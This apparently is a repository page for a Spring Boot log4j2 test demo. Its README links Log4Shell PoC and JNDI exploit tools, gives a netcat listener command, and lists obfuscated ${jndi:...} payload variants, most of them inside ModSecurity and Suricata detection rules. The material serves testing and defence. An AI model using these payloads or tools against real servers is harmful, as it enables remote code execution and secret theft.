# springboot-logging-demo

**Repository Path**: redauzhang/springboot-logging-demo

## Basic Information

- **Project Name**: springboot-logging-demo
- **Description**: springboot-logging-demo 使用 log4j2 测试。
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No

## Statistics

- **Stars**: 0
- **Forks**: 0
- **Created**: 2021-12-11
- **Last Updated**: 2021-12-22

## Categories & Tags

**Categories**: Uncategorized

**Tags**: None

## README

# springboot demo 构建
## 安装 springboot-logging demo 

### mvn 使用
- [hawei-maven-settings.xml](https://mirrors.huaweicloud.com/api/v1/configurations/maven?)
> 替换上 `apache-maven-3.8.1`下目录的 `conf`下的 `settings.xml` 即可。
- `mvn package install` 或者点击`idea`右上角的锤子按钮

### 项目参考
- https://github.com/tangxiaofeng7/BurpLog4j2Scan
- https://github.com/2b45/CVE-2021-44228-Apache-Log4j-Rce
- https://github.com/kozmer/log4j-shell-poc

# 检测工具 
- 静态文件jar扫描  https://github.com/logpresso/CVE-2021-44228-Scanner 
- web接口扫描  https://github.com/fullhunt/log4j-scan 

# JDNI 流氓服务端
- 如果是poc, 直接使用 `nc -nvlp 10399`
- https://github.com/welk1n/JNDI-Injection-Exploit
- https://github.com/0x727/JNDIExploit 

# 共享情报
- [log4shell -ioc ](https://github.com/NCSC-NL/log4shell/tree/main/iocs)
- [微步 apache_log4j2](https://x.threatbook.cn/v5/feature_vul/apache_log4j2)

# 防护方法
- 绕过 https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
- 重要参考[NCSC-NL/log4shell](https://github.com/NCSC-NL/log4shell)

## modseucurity rules 
- 参考 https://github.com/coreruleset/coreruleset/issues/2331 
- https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/

```
# https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
# ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://
# ${${::-j}ndi:rmi://
# ${jndi:rmi://
# ${${lower:jndi}:${lower:rmi}://
# ${${lower:${lower:jndi}}:${lower:rmi}://
# ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://
# ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://
# ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://
#
#  ./regexp-assemble-v2.pl test.data
# # yum -y install cpan; cpan install Regexp::Assemble

SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx .*\$\{(?:(\$\{\:\:\-j\}|j|J|\$\{lower\:j\}|\$\{upper\:j\})(\$\{\:\:\-n\}|n|N|\$\{lower\:n\}|\$\{upper\:n\})(\$\{\:\:\-d\}|d|D|\$\{lower\:d\}|\$\{upper\:d\})(\$\{\:\:\-i\}|i|I|\$\{lower\:i\}|\$\{upper\:i\}):(\$\{\:\:\-r\}|r|R|\$\{lower\:r\}|\$\{upper\:j\})(\$\{\:\:\-m\}|m|M|\$\{lower\:m\}|\$\{upper\:m\})(\$\{\:\:\-i\}|i|I|\$\{lower\:i\}|\$\{upper\:i\})|\$\{lower:(?:j(?:\}\$\{(?:upper:n\}\$\{lower:d\}\$\{upper:i\}:\$\{lower:r\}m\$\{lower:i\}|lower:n\}\$\{lower:d\}i:\$\{lower:rmi)|ndi\}:\$\{lower:rmi)|\$\{lower:jndi\}\}:\$\{lower:rmi)\}):\/\/.*" \
    "id:7170001,\
    phase:2,\
    block,\
    capture,\
    t:none,\
    msg:'Apache Log4j Rce Exploit (CVE-2021-44228)',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'application-multi',\
    tag:'language-shell',\
    tag:'attack-rce',\
    severity:'CRITICAL',\
    setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
    setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
```

## suricata 规则集
````

alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034667; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_11;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|iiop|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034668; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_11;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; distance:0; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034661; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|3a 2f 2f|"; distance:0; within:20; reference:cve,2021-44228; classtype:misc-activity; sid:2034662; rev:2; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034663; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|upper|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034664; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034665; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034666; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, former_category HUNTING, updated_at 2021_12_11;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE DNS Query for Observed CVE-2021-44228 Payload Domain"; dns.query; dotprefix; content:".bingsearchlib.com"; nocase; endswith; reference:url,twitter.com/sans_isc/status/1469305954835521539; reference:cve,2021-44228; classtype:domain-c2; sid:2034670; rev:1; metadata:attack_target Client_and_Server, created_at 2021_12_11, cve CVE_2121_44228, deployment Perimeter, former_category ATTACK_RESPONSE, performance_impact Low, signature_severity Major, updated_at 2021_12_11;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228)"; content:"|24 7b|"; content:"|24 7b 3a 3a|"; distance:0; within:300; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034674; rev:1; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_12;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034676; rev:1; metadata:attack_target Server, created_at 2021_12_13, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_13;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key Disclosure (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; content:"|24 7b|env|3a|AWS_ACCESS_KEY_ID"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034699; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228)"; flow:established,to_server; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%24)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034659; rev:2; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M1 (CVE-2021-44228)"; content:"%7bjndi%3a"; nocase; fast_pattern; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034660; rev:3; metadata:attack_target Server, created_at 2021_12_11, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
#alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228)"; flow:established,to_server; content:"%7b"; nocase; fast_pattern; pcre:"/^(j|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)j(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-j(\x7d|%7d))(n|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)n(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-n(\x7d|%7d))/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)\x3a(d|n|m)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034671; rev:2; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
#alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/13 Obfuscation Observed (CVE-2021-44228)"; content:"%7b"; nocase; fast_pattern; pcre:"/^(j|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)j(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-j(\x7d|%7d))(n|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)n(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-n(\x7d|%7d))/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(l|r|d)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(l|r|d)(\x7d|%7d))(d|n|m|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(d|n|m)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(d|n|m)(\x7d|%7d))(a|i|s|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)(a|i|s)(\x7d|%7d)|(\x24|%24)(\x7b|%7b)(\x3a|%3a){1,2}\-(a|i|s)(\x7d|%7d))(p|(\x24|%24)(\x7b|%7b)(lower|upper)(\x3a|%3a)p(\x7d|%7d))/Ri"; reference:cve,2021-44228; classtype:attempted-admin; sid:2034672; rev:2; metadata:attack_target Server, created_at 2021_12_12, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M2 (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034700; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass M2 (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034701; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
#alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|"; fast_pattern; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d|\x24\x7b\x3a\x3a\-(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d|\x24\x7b\x3a\x3a\-(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d|\x24\x7b\x3a\x3a\-(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034702; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
#alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed (CVE-2021-44228)"; content:"|24 7b|"; fast_pattern; pcre:"/^(j|\x24\x7b(lower|upper)\x3aj\x7d|\x24\x7b\x3a\x3a\-j\x7d)(n|\x24\x7b(lower|upper)\x3an\x7d|\x24\x7b\x3a\x3a\-n\x7d)/Ri"; content:"|3a|"; distance:0; pcre:"/^(l|r|d|\x24\x7b(lower|upper)\x3a(l|r|d)\x7d|\x24\x7b\x3a\x3a\-(l|r|d)\x7d)(d|n|m|\x24\x7b(lower|upper)\x3a(d|n|m)\x7d|\x24\x7b\x3a\x3a\-(d|n|m)\x7d)(a|i|s|\x24\x7b(lower|upper)\x3a(a|i|s)\x7d|\x24\x7b\x3a\x3a\-(a|i|s)\x7d)(p|\x24\x7b(lower|upper)\x3a(p)\x7d)/Ri"; content:"|3a 2f 2f|"; distance:0; reference:cve,2021-44228; classtype:attempted-admin; sid:2034703; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034706; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp) (CVE-2021-44228)"; content:"|24 7b 24 7b|lower|3a 24 7b|lower|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034707; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034708; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp) (CVE-2021-44228)"; content:"|24 7b 24 7b|upper|3a 24 7b|upper|3a|jndi"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034709; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034710; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|nis|3a|"; fast_pattern; reference:cve,2021-44228; classtype:attempted-admin; sid:2034711; rev:1; metadata:attack_target Server, created_at 2021_12_14, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_14;)
